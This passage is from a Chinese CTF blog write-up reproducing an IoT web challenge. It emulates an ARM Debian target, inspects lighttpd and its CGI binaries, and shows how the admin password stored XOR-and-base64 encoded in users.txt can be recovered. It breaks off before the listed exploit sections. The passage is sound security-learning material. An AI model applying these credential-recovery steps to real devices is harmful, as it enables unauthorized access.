

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=light>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/%E5%AF%BC%E8%88%AA%E9%A1%B5%E9%9D%A2/wifi.png">
  <link rel="icon" href="/img/%E5%AF%BC%E8%88%AA%E9%A1%B5%E9%9D%A2/wifi.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="flyyy">
  <meta name="keywords" content="pwn browser fuzz kernel ctf">
  
    <meta name="description" content="一道很不错的iot题">
<meta property="og:type" content="article">
<meta property="og:title" content="第八届“强网”拟态防御国际精英挑战赛 - WIN！致敬mt 复现">
<meta property="og:url" content="https://flyyy.top/2025/10/30/mimic_2025_winmt/index.html">
<meta property="og:site_name" content="flyyy&#39;s blog">
<meta property="og:description" content="一道很不错的iot题">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/title.png">
<meta property="article:published_time" content="2025-10-30T15:20:53.000Z">
<meta property="article:modified_time" content="2025-11-16T09:30:47.542Z">
<meta property="article:author" content="flyyy">
<meta property="article:tag" content="iot">
<meta property="article:tag" content="强网拟态">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/title.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>第八届“强网”拟态防御国际精英挑战赛 - WIN！致敬mt 复现 - flyyy&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"flyyy.top","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":"zh-CN","copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null},"woyaola":null,"cnzz":null},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>flyyy&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/banner.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="第八届“强网”拟态防御国际精英挑战赛 - WIN！致敬mt 复现"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        flyyy
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-30 23:20" pubdate>
          October 30, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.7k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          <!-- compatible with older versions-->
          32 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">第八届“强网”拟态防御国际精英挑战赛 - WIN！致敬mt 复现</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    Last updated on November 16, 2025 pm
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="第八届“强网”拟态防御国际精英挑战赛-WIN！致敬mt-复现"><a href="#第八届“强网”拟态防御国际精英挑战赛-WIN！致敬mt-复现" class="headerlink" title="第八届“强网”拟态防御国际精英挑战赛 - WIN！致敬mt 复现"></a>第八届“强网”拟态防御国际精英挑战赛 - WIN！致敬mt 复现</h1><h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h2><ul>
<li><p><a href="#%E5%89%8D%E8%A8%80">前言</a></p>
</li>
<li><p><a href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90">漏洞分析</a></p>
<ul>
<li><p><a href="#%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF">基本信息</a></p>
</li>
<li><p><a href="#%E8%A7%A3%E5%AF%86admin%E7%9A%84%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81">解密admin的账号密码</a></p>
</li>
<li><p><a href="#%E6%A0%88%E6%BA%A2%E5%87%BA">栈溢出</a></p>
</li>
<li><p><a href="#%E7%9B%AE%E5%BD%95%E6%88%AA%E6%96%AD">目录截断</a></p>
</li>
<li><p><a href="#%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8">字符逃逸</a></p>
</li>
<li><p><a href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C">命令执行</a></p>
</li>
</ul>
</li>
<li><p><a href="#exploit">exploit</a></p>
</li>
<li><p><a href="#%E6%80%BB%E7%BB%93">总结</a></p>
</li>
</ul>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>拟态比赛的时候时间过于匆忙，并没有很多时间看这道题目，因此赛后进行了复现，复现过程中需要感谢@zikh26师傅和神秘的@Nik Xe大哥的帮助。</p>
<blockquote>
<p>为什么第二道iot还没复现，问就是c++还没逆完</p>
</blockquote>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><h2 id="基本信息"><a href="#基本信息" class="headerlink" title="基本信息"></a>基本信息</h2><p>从启动脚本发现其实只开了一个80端口，我们先启动看一下基本的信息，可以发现80端口由lighttpd监听，启动方式为<code>/usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf</code>&#x20;</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><code class="hljs bash">root@debian-armel:/# ps -ef<br>UID        PID  PPID  C STIME TTY          TIME CMD<br>root         1     0  0 Oct27 ?        00:00:00 init [2]  <br>root         2     0  0 Oct27 ?        00:00:00 [kthreadd]<br>root         3     2  0 Oct27 ?        00:00:00 [ksoftirqd/0]<br>root         5     2  0 Oct27 ?        00:00:00 [kworker/u:0]<br>root         6     2  0 Oct27 ?        00:00:00 [watchdog/0]<br>root         7     2  0 Oct27 ?        00:00:00 [cpuset]<br>root         8     2  0 Oct27 ?        00:00:00 [khelper]<br>root         9     2  0 Oct27 ?        00:00:00 [kdevtmpfs]<br>root        10     2  0 Oct27 ?        00:00:00 [netns]<br>root        11     2  0 Oct27 ?        00:00:00 [sync_supers]<br>root        12     2  0 Oct27 ?        00:00:00 [bdi-default]<br>root        13     2  0 Oct27 ?        00:00:00 [kintegrityd]<br>root        14     2  0 Oct27 ?        00:00:00 [kblockd]<br>root        15     2  0 Oct27 ?        00:00:00 [khungtaskd]<br>root        16     2  0 Oct27 ?        00:00:00 [kswapd0]<br>root        17     2  0 Oct27 ?        00:00:00 [ksmd]<br>root        18     2  0 Oct27 ?        00:00:00 [fsnotify_mark]<br>root        19     2  0 Oct27 ?        00:00:00 [crypto]<br>root        67     2  0 Oct27 ?        00:00:00 [scsi_eh_0]<br>root       110     2  0 Oct27 ?        00:00:00 [kworker/u:1]<br>root       127     2  0 Oct27 ?        00:00:00 [jbd2/sda1-8]<br>root       128     2  0 Oct27 ?        00:00:00 [ext4-dio-unwrit]<br>root       275     1  0 Oct27 ?        00:00:00 udevd --daemon<br>root       313   275  0 Oct27 ?        00:00:00 udevd --daemon<br>root       314   275  0 Oct27 ?        00:00:00 udevd --daemon<br>root       331     2  0 Oct27 ?        00:00:00 [kpsmoused]<br>root      1507     1  0 Oct27 ?        00:00:00 /sbin/rpcbind -w<br>statd     1538     1  0 Oct27 ?        00:00:00 /sbin/rpc.statd<br>root      1543     2  0 Oct27 ?        00:00:00 [rpciod]<br>root      1545     2  0 Oct27 ?        00:00:00 [nfsiod]<br>root      1552     1  0 Oct27 ?        00:00:00 /usr/sbin/rpc.idmapd<br>root      1706     1  0 Oct27 ?        00:00:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0<br>root      1853     1  0 Oct27 ?        00:00:00 /usr/sbin/rsyslogd -c5<br>daemon    1888     1  0 Oct27 ?        00:00:00 /usr/sbin/atd<br>root      1956     1  0 Oct27 ?        00:00:00 /usr/sbin/cron<br>www-data  2226     1  0 Oct27 ?        00:00:01 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf<br>101       2237     1  0 Oct27 ?        00:00:00 /usr/sbin/exim4 -bd -q30m<br>root      2277     1  0 Oct27 ?        00:00:00 /usr/sbin/sshd<br>root      2303     1  0 Oct27 tty1     00:00:00 /sbin/getty 38400 tty1<br>root      2304     1  0 Oct27 tty2     00:00:00 /sbin/getty 38400 tty2<br>root      2305     1  0 Oct27 tty3     00:00:00 /sbin/getty 38400 tty3<br>root      2306     1  0 Oct27 tty4     00:00:00 /sbin/getty 38400 tty4<br>root      2307     1  0 Oct27 tty5     00:00:00 /sbin/getty 38400 tty5<br>root      2308     1  0 Oct27 tty6     00:00:00 /sbin/getty 38400 tty6<br>root      2309     1  0 Oct27 ttyAMA0  00:00:00 /bin/login --     <br>root      2311  2309  0 Oct27 ttyAMA0  00:00:00 -bash<br>root      2329     2  0 Oct27 ?        00:00:00 [kworker/0:0]<br>root      2334     2  0 Oct27 ?        00:00:00 [flush-8:0]<br>root      2379     2  0 Oct27 ?        00:00:00 [kworker/0:1]<br>root      2417  2277  0 02:25 ?        00:00:00 sshd: root@pts/0 <br>root      2419  2417  0 02:25 pts/0    00:00:00 -bash<br>root      2449     2  0 02:26 ?        00:00:00 [kworker/0:2]<br>root      2450  2419  0 02:26 pts/0    00:00:00 ps -ef<br>root@debian-armel:/# netstat -nlap<br>Active Internet connections (servers and established)<br>Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name<br>tcp        0      0 0.0.0.0:42959           0.0.0.0:*               LISTEN      1538/rpc.statd  <br>tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      1507/rpcbind    <br>tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      2226/lighttpd   <br>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      2277/sshd       <br>tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2237/exim4      <br>tcp        0      0 10.0.2.15:22            10.0.2.2:50541          ESTABLISHED 2417/0          <br>tcp6       0      0 :::111                  :::*                    LISTEN      1507/rpcbind    <br>tcp6       0      0 :::80                   :::*                    LISTEN      2226/lighttpd   <br>tcp6       0      0 :::22                   :::*                    LISTEN      2277/sshd       <br>tcp6       0      0 ::1:25                  :::*                    LISTEN      2237/exim4      <br>tcp6       0      0 :::44453                :::*                    LISTEN      1538/rpc.statd  <br>udp        0      0 0.0.0.0:832             0.0.0.0:*                           1507/rpcbind    <br>udp        0      0 0.0.0.0:68              0.0.0.0:*                           1706/dhclient   <br>udp        0      0 127.0.0.1:866           0.0.0.0:*                           1538/rpc.statd  <br>udp        0      0 0.0.0.0:111             0.0.0.0:*                           1507/rpcbind    <br>udp        0      0 0.0.0.0:39799           0.0.0.0:*                           1538/rpc.statd  <br>udp        0      0 0.0.0.0:8391            0.0.0.0:*                           1706/dhclient   <br>udp6       0      0 :::6690                 :::*                                1706/dhclient   <br>udp6       0      0 :::832                  :::*                                1507/rpcbind    <br>udp6       0      0 :::45389                :::*                                1538/rpc.statd  <br>udp6       0      0 :::111                  :::*                                1507/rpcbind    <br>Active UNIX domain sockets (servers and established)<br>Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path<br>unix  2      [ ACC ]     STREAM     LISTENING     3623     1507/rpcbind        /var/run/rpcbind.sock<br>unix  5      [ ]         DGRAM                    4010     1853/rsyslogd       /dev/log<br>unix  2      [ ACC ]     SEQPACKET  LISTENING     2284     275/udevd           /run/udev/control<br>unix  2      [ ]         DGRAM                    5034     2417/0              <br>unix  2      [ ]         DGRAM                    4602     1706/dhclient       <br>unix  2      [ ]         DGRAM                    4381     2309/login          <br>unix  3      [ ]         STREAM     CONNECTED     3741     1552/rpc.idmapd     <br>unix  3      [ ]         STREAM     CONNECTED     3740     1552/rpc.idmapd     <br>unix  3      [ ]         DGRAM                    2291     275/udevd           <br>unix  3      [ ]         DGRAM                    2290     275/udevd <br></code></pre></td></tr></table></figure>


<p>接着看对应的配置文件，可以看到对应的根目录，从根目录下我们可以找到cgi和部分二进制文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs bash">root@debian-armel:~# <span class="hljs-built_in">cat</span> /etc/lighttpd/lighttpd.conf<br>server.modules = (<br>  <span class="hljs-string">&quot;mod_access&quot;</span>,<br>  <span class="hljs-string">&quot;mod_alias&quot;</span>,<br>  <span class="hljs-string">&quot;mod_compress&quot;</span>,<br>   <span class="hljs-string">&quot;mod_redirect&quot;</span>,<br><span class="hljs-comment">#       &quot;mod_rewrite&quot;,</span><br>)<br><br>server.document-root        = <span class="hljs-string">&quot;/var/www&quot;</span><br>server.upload-dirs          = ( <span class="hljs-string">&quot;/var/cache/lighttpd/uploads&quot;</span> )<br>server.errorlog             = <span class="hljs-string">&quot;/var/log/lighttpd/error.log&quot;</span><br>server.pid-file             = <span class="hljs-string">&quot;/var/run/lighttpd.pid&quot;</span><br>server.username             = <span class="hljs-string">&quot;www-data&quot;</span><br>server.groupname            = <span class="hljs-string">&quot;www-data&quot;</span><br>server.port                 = 80<br><br><br>index-file.names            = ( <span class="hljs-string">&quot;index.php&quot;</span>, <span class="hljs-string">&quot;index.html&quot;</span>, <span class="hljs-string">&quot;index.lighttpd.html&quot;</span> )<br>url.access-deny             = ( <span class="hljs-string">&quot;~&quot;</span>, <span class="hljs-string">&quot;.inc&quot;</span> )<br>static-file.exclude-extensions = ( <span class="hljs-string">&quot;.php&quot;</span>, <span class="hljs-string">&quot;.pl&quot;</span>, <span class="hljs-string">&quot;.fcgi&quot;</span> )<br><br>compress.cache-dir          = <span class="hljs-string">&quot;/var/cache/lighttpd/compress/&quot;</span><br>compress.filetype           = ( <span class="hljs-string">&quot;application/javascript&quot;</span>, <span class="hljs-string">&quot;text/css&quot;</span>, <span class="hljs-string">&quot;text/html&quot;</span>, <span class="hljs-string">&quot;text/plain&quot;</span> )<br><br><span class="hljs-comment"># 加载设置响应头的模块</span><br>server.modules += ( <span class="hljs-string">&quot;mod_setenv&quot;</span> )<br><br><span class="hljs-comment"># 彻底禁用ETag（否则客户端会继续带 If-None-Match）</span><br>etag.use-inode = <span class="hljs-string">&quot;disable&quot;</span><br>etag.use-mtime = <span class="hljs-string">&quot;disable&quot;</span><br>etag.use-size  = <span class="hljs-string">&quot;disable&quot;</span><br><br><span class="hljs-comment"># 对常见静态资源直接禁用缓存</span><br><span class="hljs-variable">$HTTP</span>[<span class="hljs-string">&quot;url&quot;</span>] =~ <span class="hljs-string">&quot;\.(html|css|js|png|jpg|gif)$&quot;</span> &#123;<br>  setenv.add-response-header += (<br>    <span class="hljs-string">&quot;Cache-Control&quot;</span> =&gt; <span class="hljs-string">&quot;no-store, no-cache, must-revalidate&quot;</span>,<br>    <span class="hljs-string">&quot;Pragma&quot;</span>        =&gt; <span class="hljs-string">&quot;no-cache&quot;</span>,<br>    <span class="hljs-string">&quot;Expires&quot;</span>       =&gt; <span class="hljs-string">&quot;0&quot;</span><br>  )<br>&#125;<br><br><br><span class="hljs-comment"># default listening port for IPv6 falls back to the IPv4 port</span><br>include_shell <span class="hljs-string">&quot;/usr/share/lighttpd/use-ipv6.pl &quot;</span> + server.port<br>include_shell <span class="hljs-string">&quot;/usr/share/lighttpd/create-mime.assign.pl&quot;</span><br>include_shell <span class="hljs-string">&quot;/usr/share/lighttpd/include-conf-enabled.pl&quot;</span><br></code></pre></td></tr></table></figure>




<h2 id="解密admin的账号密码"><a href="#解密admin的账号密码" class="headerlink" title="解密admin的账号密码"></a>解密admin的账号密码</h2><p>修改下启动的参数，增加两个端口，22用于ssh连接，1234用于gdbserver的调试</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> qemu-system-arm \<br>  -M versatilepb \<br>  -m 256 \<br>  -kernel vmlinuz-3.2.0-4-versatile \<br>  -initrd initrd.img-3.2.0-4-versatile \<br>  -hda debian_wheezy_armel_standard.qcow2 \<br>  -append <span class="hljs-string">&quot;root=/dev/sda1 console=ttyAMA0&quot;</span> \<br>  -net nic -net user,hostfwd=tcp::1337-:80,hostfwd=tcp::1338-:22,hostfwd=tcp::1234-:1234 \<br>  -nographic<br></code></pre></td></tr></table></figure>




<p>尝试访问登陆页面</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_bUq-BUawnN.png" srcset="/img/loading.gif" lazyload></p>
<p>抓包看下，发现登录逻辑和auth.cgi有关</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_i3XMQzEh3F.png" srcset="/img/loading.gif" lazyload></p>
<p>把对应的lighttpd文件和cgi复制到宿主机</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs bash">➜  binfile scp -r -P 1338 root@127.0.0.1:/var/www/cgi-bin ./<br>➜  binfile scp -P 1338 root@127.0.0.1:/usr/sbin/lighttpd ./<br>➜  binfile tree ./ -L 2   <br>./<br>├── cgi-bin<br>│   ├── auth.cgi<br>│   ├── lang.cgi<br>│   ├── manage.cgi<br>│   ├── session_check.cgi<br>│   ├── upload.cgi<br>│   └── watch<br>└── lighttpd<br><br>2 directories, 7 files<br><br></code></pre></td></tr></table></figure>




<p>分析auth.cgi，发现一个存储账号密码的文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_uw5vj_kz2A.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">root@debian-armel:/var/www/cgi-bin# <span class="hljs-built_in">cat</span> /tmp/store/users.txt <br>admin:dlZ4bWFsdjUDaiYCeCUqfGYUEhBvFW97dmtxcA==<br></code></pre></td></tr></table></figure>


<p>不难看出这里的密码需要解密，跟踪下文件打开的逻辑，会发现最后有一个sprintf打印这一段数据，因此推断上面的逻辑是读取文件，所以这里可以尝试动调验证一下</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_7nUlOobIfV.png" srcset="/img/loading.gif" lazyload></p>
<p>下断点之后发现，确实是读取了admin加密后的密码，</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_7OfGipPlio.png" srcset="/img/loading.gif" lazyload></p>
<p>继续分析ida可以发现下方有一段strcmp的逻辑，经过分析可以发现其实是讲我们的输入密码进行加密后与admin加密后的密码进行对比</p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image__ts2vSVLEm.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_CQQmHOA3Hr.png" srcset="/img/loading.gif" lazyload></p>
<p>加密的算法比较简单，核心逻辑如下，先进行xor，然后将最后的结果base64加密，因此可以根据加密的后的密码计算出原本admin的密码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span 